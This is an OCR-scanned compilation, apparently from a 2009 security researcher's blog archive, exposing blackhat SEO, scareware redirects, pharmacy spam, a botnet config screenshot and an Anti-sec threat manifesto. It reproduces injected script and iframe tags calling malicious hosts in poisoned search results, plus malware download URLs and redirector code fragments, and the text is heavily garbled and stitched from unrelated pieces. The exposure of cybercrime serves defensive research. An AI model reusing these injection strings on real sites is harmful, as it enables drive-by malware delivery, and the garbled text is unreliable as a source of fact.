<script src=http://yrwap.cn/h.js> Photo #1 - (0 comments), <script src=http:// 
yrwap.cn/h.js> Photo #2 - (0 comments). <script src=http://yrwap.cn/h.js> ... 
www. beanonline. org/photos.asp?id=243 - Similar pages - 

More results from wwiw.beanonline.org » 


DecentXposure :: ThursdayiEnvy Split<script src=http://yrwap.cnih ... 
Temporary Residence Records — 11/12/2008. | almost forgot to mention this at all , and that 
would be a pure tragedy. Thursday is back, and dare | say better... 

www. decentx. com/news.asp?id=817 - 34k - Cached - Similar pages - 

Online Branding Reportsscript src=http://yrwap.cnihjs></script ... 

This site may harm your computer. 

Creating a fabulous, unique product along with a companion, sharp-dressed VVeb site doesnt 
guarantee success. VVhat good are a product and a site if no one... 

internetviz. e-seminars. bizVVebinar/Booklnformation. asp?ID=7 &source=nslr - 

Similar pages - 


leaf<script src=http://yrwap.cnihjs></script>Products Indianleaf ... 

This site may harm your computer. 

leaf products Catalogs leaf Manufacturer Buyers Manufacturers Suppliers Importers Exporters 
Buyer. 

my.expomarkets. com/catalog-manager/productlist.asp?sscatid=507 - Similar pages - 


ST 1<script src=http //yrwap.cnihjs></script><script src=http ... 

Satellite TV charts all over the world fram Asia, Europe, Atlantic and America. Daily updated 
satellite information. 

www.tracksat.com/satellite.asp?satelliteid=154 - 204k - Cached - Similar pages - 
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Search results 

Your search of Irish government information for <h1>Nude Cartoon Pom</h1><IFRAME 
src=/fbxdzw.info/t> retumed no results. Please try to use broader terms, ... 

www. cso. ie/px/u/search/search asp?q=%3Ch1 %3ENude+Cartoon+Pom%3C/nl %3E% 
3CIFRAME %20src=/ijbxdzw. info/1 %3E - 6k - Cached - fi 


Search results 

Your search of Irish government information for <h1>The Art Of Nude 
Photography</h1><IFRAME src=//rerkqz.info/1> retumed no results. ... 
ww.cso.ie/.../search.asp?q=%3Ch1 %3EThe+An+0f+Nude+Photography %3C/h1 %IE% 
SCIFRAME%20src=//rerkqz. info/1 %3E - 6k - Cached - Similar pages 


Search results 

Did you mean <h1>Nude Pictures Of Divas</n1><IFRAME src=//hickey.info/1>? Your search 
of Irish government information for <h1>Nude Pictures Of... 
www.cso.ie/px/u/search/search.asp?q=%3Ch1 ®3ENude+tPictures +Of+Divas %3C/h1 %3E% 
3CIFRAME%20src=//nkedny info/1 %3E - 6k - Cached - Similar pages 


Search results 

Your search of Irish government information for <h1>Mod The Sims 2 Nude 

Patch</h1 ><IFRAME src=//qwhhxq.info/1> retumed no results. ... 

www,cso.ie/,. search. asp?q=%3Ch1 %3EMod+The+Sims+2+Nude+Patch%3C/nl %3E% 
3CIFRAME %20src=//qwhhxq. info/1 %3E - Bk - Cached - Similar pages 


Search results 

Your search of Irish government information for <h1>Hot Nude Celebs</h1 ><IFRAME 
sic=//xegtkf info/1> retumed no results. Please try to use broader terms, ... 

www. cso.ie/px/u/search/search asp?q=%3Ch1 %3EHot+Nude+Celebs %3C/hl %3E% 
3CIFRAME%20src=//xegtkf info/1 %3E - 5k - Cached - Similar pages 


Search results 

Your search of Irish government information for <h1>Hot Nude Blonde Girls</h1 ><IFRAME 
src=/fygbtne. info/1> retumed no results. ... 

www.cso.ie/px/u/search/search asp?q=%3Ch1 %3EHot +Nude+Blonde+Girls %3C/h1 HIE 
3CIFRAME%20src=//ygbtne. info/1 %3E - 6k - Cached - Similar pages 


Search results 

Your search of Irish government information for <h1>Nude Latina Gallenes</h1><IFRAME 
src=//psyckr.info/1> retumed no results. ... 

www. cso. ie/px/u/search/search asp?q=%3Ch1 %3ENude+Latina+Galleries%3C/h1 %3E% 
3CIFRAME%20src=//psyckr.info/1 %3E - 6k - Cached - Similar pages 


Search results 

Your search of Irish government information for <h1>Nude Photos Of Lesbians</n1><IFRAME 
src=/Mndxsjn.info/1> returned no results. ... 

www. cs0o.ie/.../search.asp?q=%3Ch1 S3ENude+Photos+0f+Lesbians %3C/n1 %3E% 
3CIFRAME %20src=//hdxsjn. info %3E - 6k - Cached - Similar pages 


Search results 

Did you mean <h1>Amateur Nude Post</hi><IFRAME sre=//zdksqj.info/1>? Your search of 
Irish government information for <h1>Amateur Nude Posts</h1><IFRAME ... 
www.cso.ie/px/u/search/search asp?q=%3Ch1 %3EAmateur+Nude+Posts %3C/h1 %3E% 
3CIFRAME%20src=//zdksqj.info/1 %3E - 6k - Cached - Similar pages 
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Search for ‘tramadol <iframe src=//195.225.178.21/t>": FAQ Search... 

Your search - tramadol <iframe sro=//195.225.178.214> - did not match any frequently asked 
questions. Most Frequently Asked. What is the Citation Builder? ... 

www. lib.ncsu.edu/fag/search, php? q=tramadol%20%3Ciframe %20srce=//195. 225. 178. 21A%3ZE - 
18k - Cached - Similar pages 


h for ‘tram: <IFRAM =if “FA rch 
Your search - tramadol <IFRAME src=//195.225.178,.21A> - did not match any frequently 
asked questions. Most Frequently Asked. What is the Citation Builder? ... 
www. lib.ncsu.edufag/search. php?q=tramadol+%3CIF RAME %20src=//195.225.178.21A%3E - 
18k - Cached - Similar pages 


Search for ‘cialis <IFRAME src=//195.225.178.21/c>" FAQ Search... 

Your search - cialis <IFRAME sre=//195.225.178.21/c> - did not match any frequently asked 
questions. Most Frequently Asked. What is the Citation Builder? ... 

www lib. ncsu.edu/fag/search, php?q=cialis %20 %3CIF RAME %20sre=//195,225.178.21/c%3E - 
18k - Cached - Similar pages 


h for ‘phentermine <iframe src=//195.225.178.21/p>" FAQ ... 
Your search - phentermine <iframe src=//195.225.178.21/p> - did not match any frequently 
asked questions. Most Frequently Asked ... 
www lib.ncsu. edu/fag/search. php?q=phentermine%20%3C iframe %20src=//195.225.178.21/p% 
3E - 18k - Cached - Similar pages 


Search for ‘phentermine <IFRAME src=//195.225.178.21/p>"" FAQ... 

Your search - phentermine <IFRAME src=//195.225.178.21/p> - did not match any frequently 
asked questions. Most Frequently Asked ... 

www .lib.ncsu.edu/fag/search. php?q=phentermine%20 %3CIF RAME % 
Wsre=//195.225.178.21/p%IE - 18k - Cached - Similar pages 


Search for ‘Viagra <IFRAME src=//195.225.178.21/v>": FAQ Search... 
Your search - viagra <IFRAME src=//195.225.178.21/v> - did not match any frequently asked 


questions. Most Frequently Asked. What is the Citation Builder? ... 
ww. lib.ncsu.edufag/search., php? q=viagra%20 %3CIF RAME %20src=//195. 225,178. 214%3E - 
18k - Cached - Similar pages 


earch for ‘cialis <iframe src=//196. 
Your search - cialis <iframe sro=//195.225.178.21/c> - did not match any frequently asked 
questions. Most Frequently Asked. What is the Citation Builder? ... 
www lib.ncsu.edu/fag/search. php?q=cialis%20%3Ciframe% 20sre=//195. 225. 178.21/c%3E - 
18k - Cached - Similar pages 


Search for ‘free ringtones download free ringtones <iframe src ... 

Matches for: free ringtones download free ringtones <iframe sro=//195.225.178.21/r>, Why 
cant | open the file after! download a data set from ICPSR? ... 

www. lib.ncsu.edul...//195,225.178,.21/r%3E - 16k - Cached - Similar pages 


Search for ‘free ringtones download free ringtones <IFRAME src ... 

Matches for: free ringtones download free ringtones <IFRAME sro=//195.225.178.21/r>. Why 
cant | open the file after | download a data set from ICPSR? ... 

www lib.nesu.edul...//195,225.178.21/r%3E - 16k - Cached - Similar pages 


Search for ‘verity records <IFRAME src=//195.225.178.21/5>" FAQ... 
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dreams-about-lady .com - Email: JosiahMillerTP@gmail.com 
inspiredlove .net - Email: antonkovalchukk@gmail.com 
make-family .net - Email: JosiahMiller[-P@gmail.com 
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F-Prot 444,56 2009-8-4 22:49:7 o 
BitDefender v7,00825 2009-8-5 16:25:8 o 
AVG 8.5.286 2009-8-1 14:47:24 o 
F-Secure 7.02 tausld 73807 2009-8-5 15:50:58 Trojan-ArcBomb. ZIP Bubl.b (AVP) 


© 2008 — Private antivirus service | * HotLog Pe WAY 
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CIALIS 20mg x 60 Pills Only $159 | best prices 
great quality ! 24/7 customer support = Quality 
Guaranteed ! We ship to ai11 U.S states * ! 


OStandart Ad 
Descr 
ana: \Doamene and Se[ Gros] 
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CIALIS 20mg 30 Pills - supercheap $89 


CIALIS 20mg x 60 Pills Onty $159 ! best prices great quality | 24/7 customer 
support - Quality Guaranteed | We ship to all U.S states | ! 
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Buy Cialis Online 


»4 


CIALIS 20mg 30 Pills - supercheap $89 


CIALIS 20mg « 60 Pills Orly $159 | best prices great quality | 24/7 customer 
support - Quality Guaranteed | Ve ship to of US states |! 


oC ales, 


~~—!-- he=| Bary Cialis and Enjoy! Cialis (generic) 20mg x 90 pills $189 


== No prescription needed! Ciaks (genenc) 20mg x 30 pelts 89.958, 180 pelts 
| 2895 We accept VISA, MasterCard AMEX ACH Discover, eCheck Delve 
\ Airmaé 10-14 days 108. Courer 5-9 days 308 
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CIALIS Best Price $0.9 No hidden charges 


Cialrs 20 mg x 48 Pilg = $99) 100 Pits —$155 | 200 Pits = $285 Fast 


Shipping - 100% SATISFACTION Assured, Money Back Guarantees, 90000¢ 
US. UK. CANADIAN Customers! VISAVAME 
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ywww.ualadys.com 
Network Operation Centers 


ie 4 


/ ill 
| 
| 


Notice some of the registrant’s emails, namely 
It gets even more 


shall we? 


Let’s connect the dots, 
supportnewest@safe-mail.net and sup3portne3west@safe-mail.net. 
interesting taking into consideration the fact that the [2]money laundering group’s botnet 


command and control domain was registered to supp3ortnewest@safe-mail.net. Moreover, 
among the unique usernames used exclusively by this botnet, was in fact the one used in 


Confidential Connections spam campaigns, confirming their connection. 
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CIALIS Best Price $0.9 Mo hidden charges 

Cialis 20 sg x 48 Pills = €95 | 100 Pills -$1E€S5 | 200 Pilla = ¢285, Fast Shipping 
100% SATISFACTION Assured, Money Back Guatantees, F0000+Satistied US, UK, CANADIAN 

Customers! VISA/AMEX 


http: //superfarmashop . com/ v saer a 


CIALIS Best Price § 0.9 No hidden charges 


Cialis 20 mg x 48 Pills = $99 | 100 Pills 

=$165 | 200 Pills = $285, Fast Shipping - 

100% SATISFACTION Assured, Money Back Guarantees, 
90000+Satisfied US, UK, CANADIAN Customers! 

VISA/ AMEX 


su r vias 


CIALIS Best Price $0.9 No hidden charges 


Cialis 20 mg x 48 Pills = $99 | 100 Pills =$165 | 200 Pills = $285, Fast Shipping - 
100% SATISFACTION Assured, Money Back Guarantees, 90000+Satisfied US, UK, CANADL 
VISAAMEX 


http://superfarmashop.comagra 


CIALIS Best Price $0.9 No hidden charges 
Cialis 20 mg x 48 Pills = $99 | 100 Pills =$165 | 200 Pils = $285 
Fast Shipping - 100% SATISFACTION Assured, Money Back Guarantees, 90000+Satsfied 


US, UK, CANADIAN Customers! VISA/AMEX 


www. superpharmashop.com Cialis 


Cialis 20 mg x 48 Pills = $99 | 100 Pills =$165 | 200 Pills = $285, 


Fast Shipping - 100% SATISFACTION Assured, Money Back Guarantees, 90000+Satisfied 
US, UK, CANADIAN Customers! VISAJAMEX 
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imagesnack 


Proudly presents 


Anti-sec. We're a movement dedicated to the eradication of full-disclosure. We wanted to give 
everyone an im of what we're all about 


Full-disclosure is the disclosure of exploits publicly — anywhere. The security industry uses full- 
disclosure to profit and develop scare-tactics to convince people into buying their firewalls, anti-virus 
software, and auditing services 


Meanwhile, script kiddies copy and paste these exploits and compile them, ready to strike any and all 
vulnerable servers they can get a hold of. If whitehats were truly about security this stuff would not be 
published, not even exploits with silly edits to make them slightly unusable 


As an added bonus, if publication wasn't enough, these exploits are mirrored and distributed widely 
across the Internet with a nice little advertisement embedded in them for the crew or website which 
first exposed the vulnerability to the public 


It's about money. While the worid Is difficult to change, and money will certainly continue to be very 
important in the eyes of many, our battle is that of the removal of full-disclosure for the purpose of 
making it harder for the security industry to exploit its consequences 


it is our goal that, through mayhem and the destruction of all exploitive and detrimental communities, 
companies, and individuals, full-disclosure will be abandoned and the security industry will be forced 
to reform 

How do we plan to achieve this? Through the full and unrelenting, unmerciful elimination of all 
supporters of full-disclosure and the security industry in its present form. If you own a security blog, an 
exploit publication website or you distribute any exploits... “you are a target and you will be rm’d. Only 
@ matter of time.” 


This isn't like before. This time everyone and everything is getting owned 


Signed: The Anti-sec Movement 


No images were harmed in the making of this... image 
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DCU KGelS-S- lw e Whe — — — ———— Nlwlfore efrtmme —d 
(D Ble Got em rsert Projet Bult Tools Window theo 


- t by bitin 
(258 | ADM | TRITO | USB) PSTORE | DOCS | SUPERSTS | TORRENT | P2P | ANTI-GANDBOX } 


TiBot by hit3n © 


cher wetuahendle[) * "sS3E7Ku" ; Chempe ne every compile! 
— ao = “*IBot~ 

char prefix eas 

cher soteosal } * *Xwandirk": 

char exenane| a xsvice.exe* 

cher eathhostit) > -81e@0Ni0 CoM* 

cl ~ - % 

zon ssBepuane *{ as Nias . 
cher sz: ne = *Vindows viCeS 
char USB_STRF dewauer) * “service exe” 

cher PSB_CHANNEL + "#Fude" TSB Chen 
char pstore_chan + *#Fude* ‘ PSTORE Chan 


SERVER sintof }-{ 
ae ttpl biz”. "DorKinG” 1337. "sFede".°*.*~ix".*-ax"."#Fuds" 
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WARNING | ILLEGAL PROCEDURE ff 


on COM #7) 


Open COM poet OK 

Cri SO40.EMP protocet 0301 ‘My Downloads Mobi progammer\Sorg€ ncsson'\Fiemmvar 

PHONE IS BROWN My Downlosds\Mobd programmer Sory€ ncsson\ Famer ¢ | 
OTP status:0 locked: C1D:36 PAF!) IME| SENN CERT. CROWN 

Loader. 041214 0816 LLECC1326743_COMPACTPRODUCTION R2AB 

Flash props set ok Read GDFS 
writing J. \My Downloads \M obi programenet\Sceg€ acsson'\ Femenaee \W BOTW WHEGDFS | 


Unlock 
FLASH CID detected 35 
seieo 
Flesd FLASH | 
Flash ID check: 2000 | 
Wite SCRIPT | 


ena fe \My Downloads \Moba peogranenet \Scey€ ncsson\Famenwe\WBO Wer 
CuRi alee FILE G1D.36. 
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.ualadys.com 
09 


Naturally, Confidential Connections are also rubbing shoulders with more cybercrime facilitat- 
ing domains sharing the same DNS infrastructure (ns1.srv .com). 


For instance, superfuturebiz .com/maingovermnfer5 .com_ = (Trojan-Spy.Win32.Zbot.uyn) 
where a Trojan-Spy.Win32.Zbot.uyn is hosted at maingovermnfer5 .com/anyfldr/demo.exe 
which once executed attempts to download [3]Zeus crimeware from maingovermnfer5 


.com/anyfidr/cfg.bin. 
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waiting only for youll! 


Moreover, carder-shop .com which is an [4]ex-Atrivo darling, yourmagicpills .com which is a 
typical pharmaceutical scam, zaikib .in a malware command and control, and eefs .info which 
is a phony "East Europe Financial System" and looks like a typical money mule recruitment 
operation. 


1. http: //ddanchev. blogspot .com/2009/05/dating-spam- campaign-promotes- bogus. html 

2. http: //ddanchev. blogspot . com/2009/05/inside-money-laundering- groups- spamming. html 

3. http://www.virustotal.com/analisis/b3dd94141526568d434f 41 3b58£ 99f 5c4b3e011026e7da7e17f5f3816126edbc- 12438 
67781 

4. http://www.spamhaus.org/archive/evidence/malwarehosts/atrivo. html 


5.6.2 Summarizing Zero Day’s Posts for May (2009-06-02 15:49) 
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BNET | TECHREPUBLIC | ZDNET Lollapalooga 2009 


Search: EGEiiag) in Blogs 4 
ZNet Searchin Blogs 


News & Blogs Videos White Papers Downloads Reviews Popular 


a 
Ryan Naraine and Dancho Danchev 

% Mobile fp WB Email Alert i fe 
Tune ist, 2009 GuOT 
Apple plugs gaping QuickTime Spo 
security holes Smartphones 

JS. retailers lose $40 t ) annually due Last year, many 

Cogn sha Cate vets Data et wmottlen supply chain processes, | Swanennen deterred 
oe = CR — —_ , ; laptops in favor of 
of) 21 TalkBaks -'@ | S| we +6 aa eeat Omenns 


phone, calendar, 
email, IM end Web 


; Apple today released QuickTime 7,6.2 with fixes for a variety access, they're 
of sacurity vulnerabilities, some of which could lead to arguably the most 
arbitrary code execution attacks practical business 
tools, Check out the 
; ink latest CNET Rewews 
The update, available for Mac OS X, Windows XP and Sponsored Links of Biack oe “4 2 
Windows Vista, covers a total of 10 documented Gevices for all th 
ineranlibes that could be exploited via booby-tr id movie, video, imac Recommended Dow nload kaowtedee a c 
De > ~ +e . o 3 
brea ez ee ne ee eee tee ne PC Magazine Editor's Choice Winner Best = snag to make an 
and audio files Anti-Spyware. Secure Your PC! intettigant chotcn 
H the Getals T a . rose @ 
pt Top 10 Antivirus Software From Our Sponsors 
Read Reviews and Compare the Top 10 
Read the rest of this entry as -_8 emaee Preece and he 


The following is a brief summary of all of my posts at ZDNet’s [1]Zero Day for May. 


You can also go through previous summaries for [2]April, [3]March, [4]February, [5]Jan- 
uary, [6]December, [7]November, [8]October, [9]September, [10]August and [11]July, as well 
as subscribe to my [12]personal RSS feed or [13]Zero Day’s main feed. 


Notable articles include: [14]lnside the botnets that never make the news - a [15]gallery; 
[16]China’s ’secure’ OS Kylin - a threat to U.S offsensive cyber capabilities? and [17]The Web’s 
most dangerous keywords to search for. 


01. [18]Cybercriminals promoting malware-friendly search engines 

02. [19]New Mac OS X email worm discovered 

03. [20]China’s ‘secure’ OS Kylin - a threat to U.S offsensive cyber capabilities? 
04. [21]Spammers harvesting emails from Twitter - in real time 

05. [22]56th variant of the Koobface worm detected 

06. [23]Study: password resetting ’security questions’ easily guessed 

07. [24]D-Link router’s CAPTCHA flawed, WPA passphrase retrieved 

08. [25]Inside the botnets that never make the news - a gallery 

09. [26]The Web’s most dangerous keywords to search for 


1. http: //blogs.zdnet .com/securit 


. http: //ddanchev. blogspot .com/2009/05/summarizing-zero-days-posts-for-april.htm 
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The world of information warfare 


Network “Denia -of-service” 
sniffing Computer attacks 
hacking 


Eavesdropping Computer viruses, worms, 


logic bombs 


Password 
cracking : 
Electronic 
weapons 
Open source 
intelligence 
Information 
Agent blockades 
recruitment 
. Trojan horse 
Perception 
management Popa 
Data Network or email 
modification address spoofing 
Hoax Social 
emails engineering 
[654] 
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ie Ede Vew Favortes Tools Help 7 
1 Se cenad: Emad from Googe HO-B- 


Gma j | Welcome to Gmail 


A Google approach to email. 


Gmail is a new kind of webmail, built on the idea that email can be more intuitive, efficient, and useful. And maybe even fun. After all 


Gmail has Sign in to Gail 
Google Ac 
Less spam 
Keep unwanted messages out of your inbox with Google's innovative technology. Usemame [ 
Password | 
Mobile access Raviember 
Read Gmail on your mobile phone by pointing your phone's web browser to http://gmail.com/app Learn more = c sta or 
Lots of space Sign in 
Over 6945903150 megabytes (and counting) of free storage so you'll never need to delete another message. 
t lat a 


nned by ECHELON 
or Your emails will be scanned via the ECHELON system and be analysed by the National Security Agencey to keep you sale 

from AIC.1.A.da terrorists. You can trust your personal emails with the honorable men and women of the Government known 
for thier integrity and competent use of your private information. http://infowars.com Learn more 


New to Gmail? i's f 


Create an ac 


About Gmail Ni 


©2008 Google - Gmail for Organizatsons - Gmail Blog - Terms - Help 
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& warm "Eid Mubaarak from mshallatshaheed to all of our readers and the 


Cherabaa’ Nasheed Mix #% 
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. http://ddanchev. blogspot .com/2009/03/summarizing-zero-days-posts-for.htm 


ttp://ddanchev.blogspot.com/2009/02/summarizing-zero-days-posts-for- january. htm 


ttp://ddanchev.blogspot.com/2009/01/summarizing-zero-days-posts-for.htm 


. http://ddanchev. blogspot .com/2008/12/summarizing-zero-days-posts-for.htm 


. http: //ddanchev.blogspot .com/2008/11/summarizing-zero-days-posts-for-october.htm 


. http: //ddanchev.blogspot.com/2008/10/summarizing-zero-days-posts-for.htm 
ttp://ddanchev. blogspot .com/2008/09/summarizing-zero-days-posts-for-august.htm 


ttp://ddanchev. blogspot .com/2008/08/summarizing-zero-days-posts-for-july.htm 
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5 
6. 
7 
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10. 


. http://updates .zdnet.com/tags/danchotdanchev. htm1?t=0és=0k0=14mode=rss 


25. http://blogs.zdnet.com/security/?p=3432 
26. 7 


13. 
14. http://blogs.zdnet .com/security/?p=3432 
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5.6.3 From Ukrainian Blackhat SEO Gang With Love (2009-06-04 16:45) 


S)s HIT 


é 20 
7 me HTTP Privateacieeal cn textfenl 
i] & 200 HTTP artinawerchveproxanS.com = fifide2010-1Giamersh= Bback= 13,540 textfan 
We 200 ~=OHTTP arkimawarclveproscary3.com fi feeg/query.ts 55,746 appication/... 
io =o Ss#HTTP orkimalwarclveproscarv3.com fi fimg/yquenyaint. js 681 application’... 
1) 
{a} 12 200 HTTP artimalwarelveproscarw3.com fi fing/istfle. 13,220 asppication/ 
» 
14 200=—OsMTTP artimalwarelveproscanv3.com fi fimg/drugndrup.is 3,670 application! 
2) is 200 nrre }.macmind.com fappigeop.i 413° textfhernd; c 


i bared 


90. pho?kd=2010-1L0Gkeyebic7cSicatpw! 5 


text/htm 
sppikc atior 
spplkcation/ 


UPDATE: My name is now an integral part of the [1]scareware business model. 


Yet another redirector used in the ongoing blackhat SEO campaign is using it, this time saying 
just "hi" - hidancho.mine .nu/login.js redirects to privateaolemail .cn/go.php?id=2010-10 
&key=b8c7c33ca &p=1 and then to antimalwareliveproscanv3 .com where [2]the scareware 
is served - catch up with the [3]Diverse Portfolio of Fake Security Software series. 


What’s next? The release of Advanced Pro-Danchev Premium Live Mega Professional 


2293 


File Hames tame 
Hie Save: 107.63 MB 
Resohmion: T2tx57¢ 
Cue ators C015 


or ore 


econ 


[657] 


pr 07-40 


22903 


Price by 1 Installs 


0.21 
016 
019 
0.24 
0.21 
0.21 


1734.6 
1269.54 
2414.72 


6213 
7040 
10707 


[658] 
22904 


Install 
Accept 


1403 


703 
8/03 
9/03 
10/03 
11/03 


1876 


[659] 


TOTAL 


22905 


Install 
Accept 


Price by 1 Installs TOTAL 


0.05 886 
0.04 
014 
0.02 


0.05 


13940 


[660] 
22906 


ClatuctuKa 


CT OS EI CE) co es ME 


Mapt 


Install : 
Date Accept Price by 1 Installs TOTAL 


1/03 10080 
2/03 

3/03 

403 

5/03 

6/03 10246 
703 14076 
8/03 

9/03 

10/03 


11/03 


te 


14/03 


[661] 
22907 


en 


. >» Tncrall ach 
— 


ALAIOLALLOA YALL 


Country Price $ per 1000 enig bloods 
us 100 


uk 


REGISTER TODAY} 


Home! Terms | EAO | Sian Up | Abeet us | Rates 


[662] 
22908 


Tn cetall ("ar c 
ALLOLALIONVY AOL 


27 \mmeeBEGISTERTODAYI 


Home! Terms | EAQ | Sian Up | Abewt.us | Rates 


22909 


[664] 


[665] 


[666] 


22910 


Symartec com — Norton 


Viruses & Risks 


Uter Sees @ W Serer GB | search o 


Symantec internet Threat Meter 
tne Reports of Mahone Vier 6 enpaedt an tive wibe 
mom A Cree ORDER FOF a) Hut ATEN MCrOnOt V¥lrd Peat wees Gen 900 WEN MIL O08 
= CHOU 00 Of atactmert m Hpae enats Eroure hat you Otc Metatators are up to 
Use Outre Cauton Oe Oh et your APO hut Getinmors ore COTOTE “Mehemet Security Budetin MST. 
me 
‘We Acthties: Pa migte shes flected im FRAME often 
a Deal A fear Of Conder Shes Hea sting [0tet Ane ard sever stes 1) he COMET retro’ Neve 
= Leen attectio’g by an FRAME attach Be Cautious wher searchung for COMtert eaeccented wth 
Use Extre Caton ‘Tene tee Mate CET Stes Wieder IFRAME Altec: 
estard Messequeg De wemteser ead Onan Oaks OF (Tati mnes Conte 
Low Oarer@y, Pere we HO waeNDF eed CADTOaRS OF MakcIOUS COD ORCMANEING via RetArt 
1 osx fesse 9 (M) 1 he peat owerey, Some mabcess Code Gd tebe eirartage OFM Atweays 
Use Dame Caution Use formal SeOUty DreCeBONS whenever you use Mt 
file Saatieg De wadesey ead Iw eats attecting fie steer wep 
is tow ARRAS) PHS 8 o COMMON, veretie TOF Aakers NO etr Ente MakCd COD 0 Ny gr othe 
A 1 nsx Treats ore waing tether emmrods at Pes tee SM, you ShOMES atwewrys Ube Caaon when 


is 


How They Attack 
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File b.js received on 06.30.2008 14:19:07 (CET) 
Current status finished 


Result. 10/33 (30.31%) 


+8 Comoacs 

Antivirus Version 
AhnLab-V3 2008.6.27.2 
AntiVir 7.8.0.59 
Aathentiue 5.1.0.4 
Avast 4.8.2195.0 
ANG 7.$.0.526 
Bitdefender 7.2 
CAT-Quick#eal 9.80 

Clamav 0.93.1 
Drweb 4.44.0.09170 
eSate 7.0.17.0 
eTrust-Ver 31.6.5914 
Ewido 4.0 

F-Prot 4-4.4,56 
F-Secure 7.60.13502.0 
Fortinet 3.24.0.6 
Geta 2.0.7306.1623 
Ikarus 73.1.1.26.6 
Kaspersky 7.0.0.128 
McAfee $327 
Microsofe 1.3704 
NODS2v2 3226 

Norman 5.80.02 
Fanda 9.0.0.4 
Frevxi v2 

Rising 20.52.02.00 
Sophos 4.30.0 
Sunbelt 3.0.2176.2 
Symantec 10 
TheHacker 6.2.96.364 
TrendMicro 8.700.0.1004 
VBA32 3.12.6.8 
VirusBuster 4.5.11.0 


Webwasher-Gateway 6.6.2 
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Last Update 
2008.06.30 
2008.06.30 
2008.06.29 
2008.06.28 
2008.06.30 
2008.06.30 
2008.06.28 
2008.06.30 
2008.06.30 
2008.06.29 
2008.06.30 
2008.06.27 
2008.06.29 
2008.06.26 
2008.06.30 
2008.06.30 
2008.06.30 
2008.06.30 
2008.06.27 
2008.06.30 
2008.06.30 
2008.06.27 
2008.06.29 
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2008.06.30 
2008.06.30 
2008.06.26 
2008.06.30 
2008.06.28 
2008.06.30 
2008.06.30 
2008.06.30 
2008.06.30 
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Result 

REUR/ETML. Malware 
TS /Agent.Gi 
Trojan. iFrame.DR 


JS/agent.Gi 
HIML/Exploic! iFrame.G 


Trojen-DSownloader.cS.Agent.ccv 


Trojan-Downloader.J$.Agent.ccy 


Trojan: JS/Redirector.N 


HIML/Exploic! IFrame.G 


Heuristic. 5IML.Malware 


Anti-Spyware Online Cleaning Scanner 2010? 


You know you have a fan club, as well as positive ROI out of your research, when one of 
the [4]most active blackhat SEO groups for the time being starts cursing you in its [5]multiple 
redirectors, in this particular case that’s seo.hostia .ru/ddanchev-sock-my-dick.php. 


(9) 46 200s HTTP is-the-boss.com hited 4,401 text/html 
Se rm 

B)48 200 HTTP e-the-boss.com fimages/menu.js 449 application! 
c3]49 se0 Risru ddarchev-sock-my-dick. pig 401 

\S) So ™2 HTTP macrosoftwarego.com /go.phprid=2022bdhey=4069eSS.schp=1 S text/html 
[s)s1 200 =—«OHTTP artinaware-tve-scanv3.com 1/?id=2022&smersh= Sback=%IOTQIS|OXNIQMMI%IOM = =—«-13,531 text/html 
@s2 200 HTTP antinaiware-kve-scany3.com /1/imgyiquery.is $5,746  appbcation/... 
53 200 HTTP antinaware-kve-scany3.com {1 /img/iquery-int.js 631 —applcation/... 
a) cs ons 

S {T 1,211 

“se 200 HTTP ankinaiwore-lve-scanv3.com /I/imgfistfie.js 13,220 application... 
)s? 200 = HTTP antinaware-kve-scanv3.com {1 /img/drugndrup. is 3,670 — apphcation/... 
2)53 200 «OHTTP jenaxmind.com Jappigeoip.js 413 text iran; c, 
“$59 200 HTTP artinshware-Eve-scanyv3.com ji fimp/style.css 2,671 teatfess 


Back in 2007, it used to be the polite form of get lost or "[6]ai siktir vee" courtesy of the 
[7]New Media Malware Gang, a customer of the [8]Russian Business Network. 


Upon hijacking legitimate traffic and verifying that the visitor is coming from var se = new 
Array("google.","msn.","yahoo.","comcast.","aol", the redirector then takes us to macrosoft- 
warego .com; live-payment-system .com - 83.133.123.140 Email: fabian@ingenovate.com, 
and to antimalware-live-scanv3 .com - 38.99.170.9; 78.47.91.153; 83.133.115.9; 
89.47.237.52; 91.212.65.125 Email: immigration.beijing@footer.cn where [9]the scare- 
ware is served. 
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var ioldurl = document. getElementById('frame?') .sre; 
document. getElementById('frame?').sre = ioldurl; 
var ioldurl2 = document.getElementById('framed').sre; 
document.getElementById('frames').sre = ioldurl; 
} 
function rebootrajal) { 
var roldurl = document. getEléementBylId('framei3').sre; 
document.getElementById('framei3').sre = roldurl; 
var roldurl2 = document.getElementById('framel4').sre; 


document.getElementById('framei4').sre = roldurl; 
} 
setInterval(rebootfars, 3000); 
setiInterval{rebootirna, 3500); 
setInterval (rebootraja, 2000); 
</script> 
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while ( true ) { 


print '.': 
flush( ); 


reqMultiCurls( $sites ); 


Service 
Unavailable 
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Server Error in ‘/' 
Application. 


Runtime Error 


Description: An sepicaton error 
occurred on the server. The current custom 
trror seflings for thes application provers the 
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18:57:22: Fast Ethernet Car..[0000)[Ref# 0] Blocking incoming UDP: src=192.168.100.5, dst=192.163.103.255, sport=631, dport=631. 
18:57:27: Fast Ethemet Car..[0000)[Ref# 0) Blocking incoming UDP: ste=192.168,103,150, dst=255.255,255, 255, sporte678, dport=5678, 
18:57:30: Fast Ethemet Car..[0000)[Ref# 3] Blocking incoming ICMP: src=192.168.101.253, dst=192.168.102.38, type 3. 

18:57:53: Fast Ethernet Car..[0000)[Ref# 0] Blocking incoming UDP: src=192.168.100.5, dst=192.168.103.255, sport=631, dport=631. 
18:58:04: Fast Ethernet Car..[0000)[Ref# 0) Blocking incoming UDP: ste=192.168.100.31, dst=192.168, 102.38, sport=9839, dpoit=137. 
18:58:08: Fast Ethernet Car..[0000)[Ref# 0) Blocking incoming UDP: src=192.168.100.31, dst=192.168.102.38, sport=9839, dport=137. 
18:58:15: Fast Ethernet Car..[0000)[Ref# 0] Blocking incoming UDP: sre=192.168.100.31, dst=192.168,102.38, sport=9839, dpoit=137. 
18:58:24: Fast Ethermet Car..[0000)[Reff 0) Blocking incoming UDP: ste=192.168.100.5, dst=192.168.103.255, sport=631, dport=631. 
18:58:27: Fast Ethernet Car..[0000)[Ref# 0] Blocking incoming UDP: stc=0.0.0.0, dst=255.255.255.255, sport=68, dport=67. 

18:58:27: Fast Ethernet Car..[0000)[Reft 0) Blocking incoming UDP: ste=192.168,103.150, dst=255.255,255, 255, sport=§678, dport=5678, 
18:58:30: Fast Ethernet Car..[0000)[Ref# 0) Blocking incoming UDP: stc=192.168.100.31, dst=192.168. 102.38, sport=9885, dport=137. 
18:58:31: Fast Ethernet Car..[0000)[Ref# 3] Blocking incoming ICMP: stc=192.168.101.253, dst=192.168.102.38, type 3. 

